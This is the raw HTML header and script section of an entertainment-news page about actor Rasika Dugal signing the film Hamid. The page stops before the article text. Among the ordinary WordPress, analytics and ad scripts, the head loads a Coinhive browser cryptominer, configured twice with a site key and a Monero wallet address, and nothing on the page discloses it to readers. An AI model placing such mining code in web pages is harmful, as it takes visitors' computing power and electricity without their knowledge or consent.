<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en-US"
 xmlns:fb="http://ogp.me/ns/fb#"> <!--<![endif]-->
<head><link rel="stylesheet" type="text/css" href="https://d23ipcd5miwp4q.cloudfront.net/wp-content/cache/minify/10f04.css" media="all" />

    <title>After Manto Actor Rasika Dugal Signs Hamid, Saregama&#039;s Next Under Yoodlee Films - Businessofcinema.com</title>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="https://businessofcinema.com/xmlrpc.php" />
    
<!-- Open Graph Meta Tags generated by MashShare 3.4.5 - https://mashshare.net -->
<meta property="og:type" content="article" /> 
<meta property="og:title" content="After Manto Actor Rasika Dugal Signs Hamid, Saregama's Next Under Yoodlee Films" />
<meta property="og:description" content="Rasika Dugal who will soon be seen essaying the role of Safia Manto in Nandita Das' Manto with Nawazuddin Siddique is now all set." />
<meta property="og:image" content="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/06/Rasika-Dugal.jpg" />
<meta property="og:url" content="https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072" />
<meta property="og:site_name" content="Businessofcinema.com" />
<meta property="article:published_time" content="2017-10-12T14:24:14+00:00" />
<meta property="article:modified_time" content="2017-10-12T14:24:14+00:00" />
<meta property="og:updated_time" content="2017-10-12T14:24:14+00:00" />
<!-- Open Graph Meta Tags generated by MashShare 3.4.5 - https://www.mashshare.net -->
<!-- Twitter Card generated by MashShare 3.4.5 - https://www.mashshare.net -->
<meta property="og:image:width" content="620" />
<meta property="og:image:height" content="400" />
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="After Manto Actor Rasika Dugal Signs Hamid, Saregama’s Next Under Yoodlee Films">
<meta name="twitter:description" content="Rasika Dugal who will soon be seen essaying the role of Safia Manto in Nandita Das' Manto with Nawazuddin Siddique is now all set.">
<meta name="twitter:image" content="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/06/Rasika-Dugal.jpg">
<!-- Twitter Card generated by MashShare 3.4.5 - https://www.mashshare.net -->

<meta property="og:image" content="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/06/Rasika-Dugal.jpg" />
<!-- This site is optimized with the Yoast SEO Premium plugin v5.6 - https://yoast.com/wordpress/plugins/seo/ -->
<meta name="description" content="Rasika Dugal who will soon be seen essaying the role of Safia Manto in Nandita Das&#039; Manto with Nawazuddin Siddique is now all set."/>
<meta name="news_keywords" content="bollywood, nawazuddin siddique, rasika dugal, saregama, yoodlee films, entertainment, celebrities, movies, music, tv" />
<meta name="original-source" content="https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072" />
<meta name="keywords" content="rasika dugal, saregama, nawazuddin siddique, yoodlee films, bollywood"/>
<link rel="canonical" href="https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072" />
<script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/businessofcinema.com\/","name":"Businessofcinema.com","potentialAction":{"@type":"SearchAction","target":"https:\/\/businessofcinema.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script>
<!-- / Yoast SEO Premium plugin. -->

<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Businessofcinema.com &raquo; Feed" href="https://businessofcinema.com/feed" />
<link rel="alternate" type="application/rss+xml" title="Businessofcinema.com &raquo; Comments Feed" href="https://businessofcinema.com/comments/feed" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/businessofcinema.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.2"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,56826,8203,55356,56819),0,0),c=j.toDataURL(),b!==c&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55358,56794,8205,9794,65039),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55358,56794,8203,9794,65039),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>




<link rel='stylesheet' id='google-fonts-style-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400%2C400italic%2C600%2C600italic%2C700%7CRoboto%3A300%2C400%2C400italic%2C500%2C500italic%2C700%2C900&#038;ver=8.1' type='text/css' media='all' />



<script type="text/javascript" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/cache/minify/df983.js"></script>


<script type='text/javascript'>
/* <![CDATA[ */
var mashsb = {"shares":"0","round_shares":"1","animate_shares":"0","dynamic_buttons":"0","share_url":"https:\/\/businessofcinema.com\/bollywood_news\/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films\/414072","title":"After+Manto+Actor+Rasika+Dugal+Signs+Hamid%2C+Saregama%E2%80%99s+Next+Under+Yoodlee+Films","image":"https:\/\/businessofcinema.com\/wp-content\/uploads\/2017\/06\/Rasika-Dugal.jpg","desc":"Rasika Dugal who will soon be seen essaying the role of Safia Manto in Nandita Das' Manto with Nawazuddin Siddique is now all set.","hashtag":"","subscribe":"link","subscribe_url":"","activestatus":"1","singular":"1","twitter_popup":"1","refresh":"0"};
/* ]]> */
</script>
<script type="text/javascript" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/cache/minify/e4995.js"></script>


<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=4.8.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wp_js_options = {"enabled":"1","site_key":"y8K97OrVZhvnOiLGOWbUINFgkZAStidR","throttle":"0","throttleMobile":"0","autostart":"","silent":"","log":"","poolEnabled":"","poolWallet":"4A1Yu35QBT6LpaiRLj6uZf9gwfDFKkHckE6WFCSsoMa9Q3btYimBC3FDTdVgQA92PVY5qjejmURXdjWiGUXKgutRHAqJz2G","variant":"","version":"2.6.0","userLoggedIn":"","userName":"","userTokens":"0","host":"businessofcinema.com","mobile":""};
/* ]]> */
</script>
<script type="text/javascript" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/cache/minify/94daa.js"></script>

<script type='text/javascript'>
/* <![CDATA[ */
var wp_js_options = {"enabled":"1","site_key":"y8K97OrVZhvnOiLGOWbUINFgkZAStidR","throttle":"0","throttleMobile":"0","autostart":"","silent":"","log":"","poolEnabled":"","poolWallet":"4A1Yu35QBT6LpaiRLj6uZf9gwfDFKkHckE6WFCSsoMa9Q3btYimBC3FDTdVgQA92PVY5qjejmURXdjWiGUXKgutRHAqJz2G","variant":"","version":"2.6.0","userLoggedIn":"","userName":"","userTokens":"0","host":"businessofcinema.com","mobile":""};
/* ]]> */
</script>
<script type="text/javascript" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/cache/minify/3f31d.js"></script>

<link rel='https://api.w.org/' href='https://businessofcinema.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://businessofcinema.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://d23ipcd5miwp4q.cloudfront.net/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.8.2" />
<link rel='shortlink' href='https://businessofcinema.com/?p=414072' />
<link rel="alternate" type="application/json+oembed" href="https://businessofcinema.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbusinessofcinema.com%2Fbollywood_news%2Fmanto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films%2F414072" />
<link rel="alternate" type="text/xml+oembed" href="https://businessofcinema.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbusinessofcinema.com%2Fbollywood_news%2Fmanto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films%2F414072&#038;format=xml" />
<meta property="fb:app_id" content="510095189187222"/>	<style id="tdw-css-placeholder"></style>			<script>
				window.tdwGlobal = {"adminUrl":"https:\/\/businessofcinema.com\/wp-admin\/","wpRestNonce":"b5f845b5f4","wpRestUrl":"https:\/\/businessofcinema.com\/wp-json\/","permalinkStructure":"\/%category%\/%postname%\/%post_id%"};
			</script>
			<!--[if lt IE 9]><script src="https://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://d23ipcd5miwp4q.cloudfront.net/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]-->      <meta name="onesignal" content="wordpress-plugin"/>
          <link rel="manifest"
            href="https://d23ipcd5miwp4q.cloudfront.net/wp-content/plugins/onesignal-free-web-push-notifications/sdk_files/manifest.json.php?gcm_sender_id="/>
          <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script>    <script>

      window.OneSignal = window.OneSignal || [];

      OneSignal.push( function() {
        OneSignal.SERVICE_WORKER_UPDATER_PATH = "OneSignalSDKUpdaterWorker.js.php";
        OneSignal.SERVICE_WORKER_PATH = "OneSignalSDKWorker.js.php";
        OneSignal.SERVICE_WORKER_PARAM = { scope: '/' };

        OneSignal.setDefaultNotificationUrl("https://businessofcinema.com");
        var oneSignal_options = {};
        window._oneSignalInitOptions = oneSignal_options;

        oneSignal_options['wordpress'] = true;
oneSignal_options['appId'] = '59e50e26-f5fa-4af8-b109-5875aae3aa8b';
oneSignal_options['autoRegister'] = true;
oneSignal_options['httpPermissionRequest'] = { };
oneSignal_options['httpPermissionRequest']['enable'] = true;
oneSignal_options['welcomeNotification'] = { };
oneSignal_options['welcomeNotification']['title'] = "";
oneSignal_options['welcomeNotification']['message'] = "";
oneSignal_options['path'] = "https://businessofcinema.com/wp-content/plugins/onesignal-free-web-push-notifications/sdk_files/";
oneSignal_options['safari_web_id'] = "web.onesignal.auto.08e72fe8-7d9e-49e9-8aad-204d649fdf9c";
oneSignal_options['promptOptions'] = { };
oneSignal_options['notifyButton'] = { };
oneSignal_options['notifyButton']['enable'] = true;
oneSignal_options['notifyButton']['position'] = 'bottom-right';
oneSignal_options['notifyButton']['theme'] = 'default';
oneSignal_options['notifyButton']['size'] = 'medium';
oneSignal_options['notifyButton']['prenotify'] = true;
oneSignal_options['notifyButton']['showCredit'] = true;
oneSignal_options['notifyButton']['text'] = {};
              OneSignal.init(window._oneSignalInitOptions);
                    });

      function documentInitOneSignal() {
        var oneSignal_elements = document.getElementsByClassName("OneSignal-prompt");

        var oneSignalLinkClickHandler = function(event) { OneSignal.push(['registerForPushNotifications']); event.preventDefault(); };        for(var i = 0; i < oneSignal_elements.length; i++)
          oneSignal_elements[i].addEventListener('click', oneSignalLinkClickHandler, false);
      }

      if (document.readyState === 'complete') {
           documentInitOneSignal();
      }
      else {
           window.addEventListener("load", function(event){
               documentInitOneSignal();
          });
      }
    </script>

<link rel="amphtml" href="https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072/amp" />
<!-- JS generated by theme -->

<script>
    
    

	    var tdBlocksArray = []; //here we store all the items for the current page

	    //td_block class - each ajax block uses a object of this class for requests
	    function tdBlock() {
		    this.id = '';
		    this.block_type = 1; //block type id (1-234 etc)
		    this.atts = '';
		    this.td_column_number = '';
		    this.td_current_page = 1; //
		    this.post_count = 0; //from wp
		    this.found_posts = 0; //from wp
		    this.max_num_pages = 0; //from wp
		    this.td_filter_value = ''; //current live filter value
		    this.is_ajax_running = false;
		    this.td_user_action = ''; // load more or infinite loader (used by the animation)
		    this.header_color = '';
		    this.ajax_pagination_infinite_stop = ''; //show load more at page x
	    }


        // td_js_generator - mini detector
        (function(){
            var htmlTag = document.getElementsByTagName("html")[0];

            if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

            if( -1 !== navigator.userAgent.indexOf('IEMobile') ){
                htmlTag.className += ' td-md-is-iemobile';
            }

        })();




        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img";
var td_animation_stack_general_selectors=".td-animation-stack img, .td-animation-stack .entry-thumb, .post img";
var td_ajax_url="https:\/\/businessofcinema.com\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=8.1";
var td_get_template_directory_uri="https:\/\/businessofcinema.com\/wp-content\/themes\/Newspaper";
var tds_snap_menu="smart_snap_always";
var tds_logo_on_sticky="";
var tds_header_style="10";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="show";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#dd3333";
var tds_smart_sidebar="enabled";
var tdThemeName="Newspaper";
var td_magnific_popup_translation_tPrev="Previous (Left arrow key)";
var td_magnific_popup_translation_tNext="Next (Right arrow key)";
var td_magnific_popup_translation_tCounter="%curr% of %total%";
var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded.";
var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded.";
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-5204375-2', 'auto');
  ga('send', 'pageview');

</script><script type="application/ld+json">
                        {
                            "@context": "http://schema.org",
                            "@type": "BreadcrumbList",
                            "itemListElement": [{
                            "@type": "ListItem",
                            "position": 1,
                                "item": {
                                "@type": "WebSite",
                                "@id": "https://businessofcinema.com/",
                                "name": "Home"                                               
                            }
                        },{
                            "@type": "ListItem",
                            "position": 2,
                                "item": {
                                "@type": "WebPage",
                                "@id": "https://businessofcinema.com/category/bollywood_news",
                                "name": "BOLLYWOOD"
                            }
                        },{
                            "@type": "ListItem",
                            "position": 3,
                                "item": {
                                "@type": "WebPage",
                                "@id": "https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072",
                                "name": "After Manto Actor Rasika Dugal Signs Hamid, Saregama&#8217;s Next Under Yoodlee Films"                                
                            }
                        }    ]
                        }
                       </script><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><script type="text/javascript" src="https://sdk.adspruce.com/1/adspruce.js?pid=3576&sid=1" defer></script>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script type="text/javascript" src="https://static.criteo.net/js/ld/publishertag.js"></script>

</head>

<body class="post-template-default single single-post postid-414072 single-format-standard manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films global-block-template-1 wpb-js-composer js-comp-ver-5.2.1 vc_responsive td-animation-stack-type0 td-full-layout" itemscope="itemscope" itemtype="https://schema.org/WebPage">

        <div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>
    
    <div class="td-menu-background"></div>
<div id="td-mobile-nav">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/businessofcinema" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.instagram.com/business_of_cinema/" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="feed" title="RSS">
                <i class="td-icon-font td-icon-rss"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/boclive" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-primary-menu-container"><ul id="menu-primary-menu" class="td-mobile-main-menu"><li id="menu-item-49384" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-first menu-item-49384"><a href="https://businessofcinema.com/category/bollywood_news">BOLLYWOOD</a></li>
<li id="menu-item-49386" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-49386"><a href="https://businessofcinema.com/category/hollywood">HOLLYWOOD</a></li>
<li id="menu-item-49389" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-49389"><a href="https://businessofcinema.com/category/videos">VIDEOS</a></li>
<li id="menu-item-49388" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-49388"><a href="https://businessofcinema.com/category/reviews">REVIEWS</a></li>
<li id="menu-item-49385" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-49385"><a href="https://businessofcinema.com/category/boxoffice">BOX OFFICE</a></li>
<li id="menu-item-80576" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-80576"><a href="https://businessofcinema.com/category/bollywood_hollywood_photos">PHOTOS</a></li>
<li id="menu-item-64970" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-64970"><a href="https://businessofcinema.com/category/business">BUSINESS</a></li>
<li id="menu-item-111282" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-111282"><a href="https://businessofcinema.com/category/tele">TV</a></li>
<li id="menu-item-156712" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-156712"><a href="https://businessofcinema.com/category/regionalmovies">REGIONAL</a></li>
<li id="menu-item-407759" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-407759"><a href="https://businessofcinema.com/category/tele/salman-khan-bigg-boss-11">Bigg Boss 11</a></li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
    </div>    <div class="td-search-background"></div>
<div class="td-search-wrap-mob">
	<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
		<form method="get" class="td-search-form" action="https://businessofcinema.com/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Search</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
			</div>
		</form>
		<div id="td-aj-search-mob"></div>
	</div>
</div>    
    
    <div id="td-outer-wrap" class="td-theme-wrap">
    
        <!--
Header style 10
-->

<div class="td-header-wrap td-header-style-10">

	<div class="td-header-top-menu-full td-container-wrap ">
		<div class="td-container td-header-row td-header-top-menu">
            
    <div class="top-bar-style-2">
        <div class="td-header-sp-top-widget">
    
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/businessofcinema" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.instagram.com/business_of_cinema/" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="feed" title="RSS">
                <i class="td-icon-font td-icon-rss"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/boclive" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span></div>
        
<div class="td-header-sp-top-menu">


	<div class="menu-top-container"><ul id="menu-trending" class="top-header-menu"><li id="menu-item-221385" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-first td-menu-item td-normal-menu menu-item-221385"><a href="http://businessofcinema.com/tag/salman-khan-2">Salman Khan</a></li>
</ul></div></div>
    </div>

<!-- LOGIN MODAL -->
		</div>
	</div>

    <div class="td-banner-wrap-full td-logo-wrap-full  td-container-wrap ">
        <div class="td-header-sp-logo">
            		<a class="td-main-logo" href="https://businessofcinema.com/">
			<img class="td-retina-data"  data-retina="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2016/08/BOC400.png" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2016/08/BOC400.png" alt="BusinessofCinema.com" title="BusinessofCinema.com" width="359"/>
			<span class="td-visual-hidden">Businessofcinema.com</span>
		</a>
	        </div>
    </div>

	<div class="td-header-menu-wrap-full td-container-wrap ">
		<div class="td-header-menu-wrap td-header-gradient">
			<div class="td-container td-header-row td-header-main-menu">
				<div id="td-header-menu" role="navigation">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo td-logo-in-header">
                <a class="td-main-logo" href="https://businessofcinema.com/">
            <img class="td-retina-data" data-retina="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2016/08/BOC400.png" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2016/08/BOC400.png" alt="BusinessofCinema.com" title="BusinessofCinema.com"/>
        </a>
        </div>
    <div class="menu-primary-menu-container"><ul id="menu-primary-menu-1" class="sf-menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-first td-menu-item td-normal-menu menu-item-49384"><a href="https://businessofcinema.com/category/bollywood_news">BOLLYWOOD</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-49386"><a href="https://businessofcinema.com/category/hollywood">HOLLYWOOD</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-49389"><a href="https://businessofcinema.com/category/videos">VIDEOS</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-49388"><a href="https://businessofcinema.com/category/reviews">REVIEWS</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-49385"><a href="https://businessofcinema.com/category/boxoffice">BOX OFFICE</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-80576"><a href="https://businessofcinema.com/category/bollywood_hollywood_photos">PHOTOS</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-64970"><a href="https://businessofcinema.com/category/business">BUSINESS</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-111282"><a href="https://businessofcinema.com/category/tele">TV</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-156712"><a href="https://businessofcinema.com/category/regionalmovies">REGIONAL</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-407759"><a href="https://businessofcinema.com/category/tele/salman-khan-bigg-boss-11">Bigg Boss 11</a></li>
</ul></div></div>


<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
                <a id="td-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
			<form method="get" class="td-search-form" action="https://businessofcinema.com/">
				<div role="search" class="td-head-form-search-wrap">
					<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>			</div>
		</div>
	</div>

    <div class="td-banner-wrap-full td-banner-bg td-container-wrap ">
        <div class="td-container-header td-header-row td-header-header">
            <div class="td-header-sp-recs">
                <div class="td-header-rec-wrap">
    
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-header td_uid_1_59df5652e408d_rand td_block_template_1 ">
<script type="text/javascript">
var td_screen_width = window.innerWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-3452818097917548" data-ad-slot="5784487118"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3452818097917548" data-ad-slot="5784487118"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3452818097917548" data-ad-slot="5784487118"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:320px;height:50px" data-ad-client="ca-pub-3452818097917548" data-ad-slot="5784487118"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 


</div>            </div>
        </div>
    </div>

</div><div class="td-main-content-wrap td-container-wrap">

    <div class="td-container td-post-template-default ">
